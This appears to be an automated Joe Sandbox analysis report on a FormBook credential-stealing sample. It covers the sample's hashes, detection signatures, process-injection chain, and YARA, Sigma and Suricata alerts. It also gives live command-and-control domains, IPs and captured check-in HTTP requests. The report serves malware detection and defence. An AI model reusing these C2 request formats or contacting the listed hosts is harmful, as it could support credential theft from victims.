Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
RO2Y11yOJ7.exe

Overview

General Information

Sample name:RO2Y11yOJ7.exe
renamed because original name is a hash value
Original sample name:12e60b3db1e0cb33c5e66d0c114b8fa1033984e21f3741e97111f41b37a04978.exe
Analysis ID:1551211
MD5:5ffe1ba845fb6e48aae4367ef675444e
SHA1:b45e53f7bc9b7b2805c1bcd62c35f1554ecdc542
SHA256:12e60b3db1e0cb33c5e66d0c114b8fa1033984e21f3741e97111f41b37a04978
Tags:exeuser-adrian__luca
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • RO2Y11yOJ7.exe (PID: 7928 cmdline: "C:\Users\user\Desktop\RO2Y11yOJ7.exe" MD5: 5FFE1BA845FB6E48AAE4367EF675444E)
    • svchost.exe (PID: 7992 cmdline: "C:\Users\user\Desktop\RO2Y11yOJ7.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • avRLXQyosx.exe (PID: 7148 cmdline: "C:\Program Files (x86)\KJyPoNHseUIsGMbuwejDQZOKlxCchvdjFeaFGBIvDseKbKAXosLmCyzHBXJZRfvRdvnJXv\avRLXQyosx.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • Atuserer.exe (PID: 6956 cmdline: "C:\Windows\SysWOW64\Atuserer.exe" MD5: D5B61959A509BDA85300781F5A829610)
          • avRLXQyosx.exe (PID: 6584 cmdline: "C:\Program Files (x86)\KJyPoNHseUIsGMbuwejDQZOKlxCchvdjFeaFGBIvDseKbKAXosLmCyzHBXJZRfvRdvnJXv\avRLXQyosx.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 7428 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000007.00000002.3153276903.0000000000820000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000004.00000002.1675780203.0000000002E90000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000004.00000002.1675422438.00000000004C0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000007.00000002.3163418586.0000000000E90000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000008.00000002.3166059888.0000000005440000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 3 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            4.2.svchost.exe.4c0000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              4.2.svchost.exe.4c0000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: Uncommon Svchost Parent Process
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\RO2Y11yOJ7.exe", CommandLine: "C:\Users\user\Desktop\RO2Y11yOJ7.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\RO2Y11yOJ7.exe", ParentImage: C:\Users\user\Desktop\RO2Y11yOJ7.exe, ParentProcessId: 7928, ParentProcessName: RO2Y11yOJ7.exe, ProcessCommandLine: "C:\Users\user\Desktop\RO2Y11yOJ7.exe", ProcessId: 7992, ProcessName: svchost.exe
                Sigma detected: Windows Processes Suspicious Parent Directory
                Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\RO2Y11yOJ7.exe", CommandLine: "C:\Users\user\Desktop\RO2Y11yOJ7.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\RO2Y11yOJ7.exe", ParentImage: C:\Users\user\Desktop\RO2Y11yOJ7.exe, ParentProcessId: 7928, ParentProcessName: RO2Y11yOJ7.exe, ProcessCommandLine: "C:\Users\user\Desktop\RO2Y11yOJ7.exe", ProcessId: 7992, ProcessName: svchost.exe

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-07T15:49:40.688943+010020229301A Network Trojan was detected52.149.20.212443192.168.2.1049764TCP
                2024-11-07T15:50:19.138094+010020229301A Network Trojan was detected20.109.210.53443192.168.2.1049972TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-07T15:50:22.133740+010028554651A Network Trojan was detected192.168.2.10499733.33.130.19080TCP
                2024-11-07T15:50:46.527094+010028554651A Network Trojan was detected192.168.2.1049977192.64.118.22180TCP
                2024-11-07T15:51:01.318763+010028554651A Network Trojan was detected192.168.2.1049981195.154.200.1580TCP
                2024-11-07T15:51:15.803730+010028554651A Network Trojan was detected192.168.2.1049985168.76.221.25280TCP
                2024-11-07T15:51:30.408170+010028554651A Network Trojan was detected192.168.2.1049989150.95.254.1680TCP
                2024-11-07T15:51:44.728604+010028554651A Network Trojan was detected192.168.2.1049993188.114.96.380TCP
                2024-11-07T15:51:58.510867+010028554651A Network Trojan was detected192.168.2.1049997103.249.106.9180TCP
                2024-11-07T15:52:12.410015+010028554651A Network Trojan was detected192.168.2.1050001172.67.202.1080TCP
                2024-11-07T15:52:27.157159+010028554651A Network Trojan was detected192.168.2.1050005156.234.28.9480TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-07T15:50:38.685584+010028554641A Network Trojan was detected192.168.2.1049974192.64.118.22180TCP
                2024-11-07T15:50:41.368303+010028554641A Network Trojan was detected192.168.2.1049975192.64.118.22180TCP
                2024-11-07T15:50:43.915878+010028554641A Network Trojan was detected192.168.2.1049976192.64.118.22180TCP
                2024-11-07T15:50:53.605281+010028554641A Network Trojan was detected192.168.2.1049978195.154.200.1580TCP
                2024-11-07T15:50:56.152178+010028554641A Network Trojan was detected192.168.2.1049979195.154.200.1580TCP
                2024-11-07T15:50:58.699230+010028554641A Network Trojan was detected192.168.2.1049980195.154.200.1580TCP
                2024-11-07T15:51:08.087996+010028554641A Network Trojan was detected192.168.2.1049982168.76.221.25280TCP
                2024-11-07T15:51:10.730228+010028554641A Network Trojan was detected192.168.2.1049983168.76.221.25280TCP
                2024-11-07T15:51:13.264976+010028554641A Network Trojan was detected192.168.2.1049984168.76.221.25280TCP
                2024-11-07T15:51:22.206440+010028554641A Network Trojan was detected192.168.2.1049986150.95.254.1680TCP
                2024-11-07T15:51:25.339847+010028554641A Network Trojan was detected192.168.2.1049987150.95.254.1680TCP
                2024-11-07T15:51:27.862211+010028554641A Network Trojan was detected192.168.2.1049988150.95.254.1680TCP
                2024-11-07T15:51:36.985157+010028554641A Network Trojan was detected192.168.2.1049990188.114.96.380TCP
                2024-11-07T15:51:39.476121+010028554641A Network Trojan was detected192.168.2.1049991188.114.96.380TCP
                2024-11-07T15:51:42.025674+010028554641A Network Trojan was detected192.168.2.1049992188.114.96.380TCP
                2024-11-07T15:51:51.011005+010028554641A Network Trojan was detected192.168.2.1049994103.249.106.9180TCP
                2024-11-07T15:51:53.901727+010028554641A Network Trojan was detected192.168.2.1049995103.249.106.9180TCP
                2024-11-07T15:51:55.979857+010028554641A Network Trojan was detected192.168.2.1049996103.249.106.9180TCP
                2024-11-07T15:52:04.770948+010028554641A Network Trojan was detected192.168.2.1049998172.67.202.1080TCP
                2024-11-07T15:52:07.365670+010028554641A Network Trojan was detected192.168.2.1049999172.67.202.1080TCP
                2024-11-07T15:52:09.870607+010028554641A Network Trojan was detected192.168.2.1050000172.67.202.1080TCP
                2024-11-07T15:52:19.727445+010028554641A Network Trojan was detected192.168.2.1050002156.234.28.9480TCP
                2024-11-07T15:52:22.121733+010028554641A Network Trojan was detected192.168.2.1050003156.234.28.9480TCP
                2024-11-07T15:52:24.713799+010028554641A Network Trojan was detected192.168.2.1050004156.234.28.9480TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus detection for URL or domain
                Source: http://www.7153115.xyz/dblf/Avira URL Cloud: Label: malware
                Source: http://www.7153115.xyz/dblf/?eL-x=xA4m52UOO3AWG6dLOPkkJ91gfa/sOtMUS9WQ9/7Ili2Upd70ADnAJWaIHnvs9U+whG/nDh7qG8iCbCHdOukQeWX5e+ZPWvcCIT2YOJAlrSuLiE5N6g==&wFVH=-zwTKPF0iPthAvira URL Cloud: Label: malware
                Source: https://00808.vip/Avira URL Cloud: Label: malware
                Multi AV Scanner detection for submitted file
                Source: RO2Y11yOJ7.exeReversingLabs: Detection: 68%
                Yara detected FormBook
                Source: Yara matchFile source: 4.2.svchost.exe.4c0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.svchost.exe.4c0000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000007.00000002.3153276903.0000000000820000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1675780203.0000000002E90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1675422438.00000000004C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3163418586.0000000000E90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.3166059888.0000000005440000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1676172842.0000000003350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3158152521.0000000000B30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3163670686.00000000023F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: RO2Y11yOJ7.exeJoe Sandbox ML: detected
                Source: RO2Y11yOJ7.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: avRLXQyosx.exe, 00000006.00000002.3160751775.000000000094E000.00000002.00000001.01000000.00000005.sdmp, avRLXQyosx.exe, 00000008.00000000.1743911480.000000000094E000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: ATuserer.pdb source: svchost.exe, 00000004.00000003.1643151077.000000000282B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.1643067119.000000000281B000.00000004.00000020.00020000.00000000.sdmp, avRLXQyosx.exe, 00000006.00000002.3158765250.00000000006A8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdbUGP source: RO2Y11yOJ7.exe, 00000002.00000003.1294048871.0000000004080000.00000004.00001000.00020000.00000000.sdmp, RO2Y11yOJ7.exe, 00000002.00000003.1303559485.0000000004270000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.1675823650.000000000309E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.1675823650.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.1571063757.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.1572919934.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, Atuserer.exe, 00000007.00000002.3164055528.0000000004A1E000.00000040.00001000.00020000.00000000.sdmp, Atuserer.exe, 00000007.00000002.3164055528.0000000004880000.00000040.00001000.00020000.00000000.sdmp, Atuserer.exe, 00000007.00000003.1677617777.00000000046D6000.00000004.00000020.00020000.00000000.sdmp, Atuserer.exe, 00000007.00000003.1675363107.00000000044E2000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: RO2Y11yOJ7.exe, 00000002.00000003.1294048871.0000000004080000.00000004.00001000.00020000.00000000.sdmp, RO2Y11yOJ7.exe, 00000002.00000003.1303559485.0000000004270000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000004.00000002.1675823650.000000000309E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.1675823650.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.1571063757.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.1572919934.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, Atuserer.exe, Atuserer.exe, 00000007.00000002.3164055528.0000000004A1E000.00000040.00001000.00020000.00000000.sdmp, Atuserer.exe, 00000007.00000002.3164055528.0000000004880000.00000040.00001000.00020000.00000000.sdmp, Atuserer.exe, 00000007.00000003.1677617777.00000000046D6000.00000004.00000020.00020000.00000000.sdmp, Atuserer.exe, 00000007.00000003.1675363107.00000000044E2000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: Atuserer.exe, 00000007.00000002.3158332138.0000000000BAA000.00000004.00000020.00020000.00000000.sdmp, Atuserer.exe, 00000007.00000002.3165412212.0000000004EAC000.00000004.10000000.00040000.00000000.sdmp, avRLXQyosx.exe, 00000008.00000000.1744457966.000000000300C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2018937107.0000000031E2C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: ATuserer.pdbGCTL source: svchost.exe, 00000004.00000003.1643151077.000000000282B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.1643067119.000000000281B000.00000004.00000020.00020000.00000000.sdmp, avRLXQyosx.exe, 00000006.00000002.3158765250.00000000006A8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: Atuserer.exe, 00000007.00000002.3158332138.0000000000BAA000.00000004.00000020.00020000.00000000.sdmp, Atuserer.exe, 00000007.00000002.3165412212.0000000004EAC000.00000004.10000000.00040000.00000000.sdmp, avRLXQyosx.exe, 00000008.00000000.1744457966.000000000300C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2018937107.0000000031E2C000.00000004.80000000.00040000.00000000.sdmp
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exeCode function: 2_2_003A449B GetFileAttributesW,FindFirstFileW,FindClose,2_2_003A449B
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exeCode function: 2_2_003AC75D FindFirstFileW,FindClose,2_2_003AC75D
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exeCode function: 2_2_003AC7E8 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,2_2_003AC7E8
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exeCode function: 2_2_003AF021 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_003AF021
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exeCode function: 2_2_003AF17E SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_003AF17E
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exeCode function: 2_2_003AF47F FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,2_2_003AF47F
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exeCode function: 2_2_003A3833 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,2_2_003A3833
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exeCode function: 2_2_003A3B56 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,2_2_003A3B56
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exeCode function: 2_2_003ABD48 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,2_2_003ABD48
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_0083C4F0 FindFirstFileW,FindNextFileW,FindClose,7_2_0083C4F0
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 4x nop then xor eax, eax7_2_00829DD0
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 4x nop then pop edi7_2_0082E1C9
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 4x nop then mov ebx, 00000004h7_2_046D04E8

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:49973 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49978 -> 195.154.200.15:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49991 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49987 -> 150.95.254.16:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49994 -> 103.249.106.91:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:49997 -> 103.249.106.91:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49976 -> 192.64.118.221:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49979 -> 195.154.200.15:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49982 -> 168.76.221.252:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49986 -> 150.95.254.16:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49974 -> 192.64.118.221:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:50000 -> 172.67.202.10:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:49989 -> 150.95.254.16:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49996 -> 103.249.106.91:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:49981 -> 195.154.200.15:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49998 -> 172.67.202.10:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:50003 -> 156.234.28.94:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:50004 -> 156.234.28.94:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:50005 -> 156.234.28.94:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:49977 -> 192.64.118.221:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49995 -> 103.249.106.91:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49988 -> 150.95.254.16:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:50001 -> 172.67.202.10:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49983 -> 168.76.221.252:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49984 -> 168.76.221.252:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49990 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49975 -> 192.64.118.221:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:49985 -> 168.76.221.252:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49992 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49999 -> 172.67.202.10:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:49993 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:50002 -> 156.234.28.94:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49980 -> 195.154.200.15:80
                Performs DNS queries to domains with low reputation
                Source: DNS query: www.7153115.xyz
                Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
                Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
                Source: Joe Sandbox ViewASN Name: NAMECHEAP-NETUS NAMECHEAP-NETUS
                Source: Joe Sandbox ViewASN Name: ULTRANETSERVICOSEMINTERNETLTDABR ULTRANETSERVICOSEMINTERNETLTDABR
                Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 52.149.20.212:443 -> 192.168.2.10:49764
                Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.109.210.53:443 -> 192.168.2.10:49972
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exeCode function: 2_2_003B2404 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,2_2_003B2404
                Source: global trafficHTTP traffic detected: GET /ugdo/?eL-x=kxJ3od325Xqo8wxQ1hBgR6SDm2DyJ3wteCEI/DiGOvMuHKXdFQvV7KpJf8xNWNcGdoq0hBwRfp4PtcpQcJYcqVm6hUSlzi3DLiLBqaXQmTBihn830w==&wFVH=-zwTKPF0iPth HTTP/1.1Host: www.lexjetcenter.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5
                Source: global trafficHTTP traffic detected: GET /favd/?wFVH=-zwTKPF0iPth&eL-x=WtgtBzW4FsxMnQSuWOIYSeEoiXDfOi+mEu8byEiY5V0Es9uEUQhozXoYk37/fSn7c76G5+FTj9P/4AI0dbo7dAuFWhjyFRNqxijvASv2x9K31F87tg== HTTP/1.1Host: www.elarac.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5
                Source: global trafficHTTP traffic detected: GET /zslv/?eL-x=EUn3g8LYsBqqsV8ZNTlu3xKd6tkG7Tp6GSwv0X2RMky81SP9KPrWQ2UszFzoalUNSIFimuT2bUDct3BiYGyyefEtviAnix38iMVeAihtAydc/vF2ig==&wFVH=-zwTKPF0iPth HTTP/1.1Host: www.budged.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5
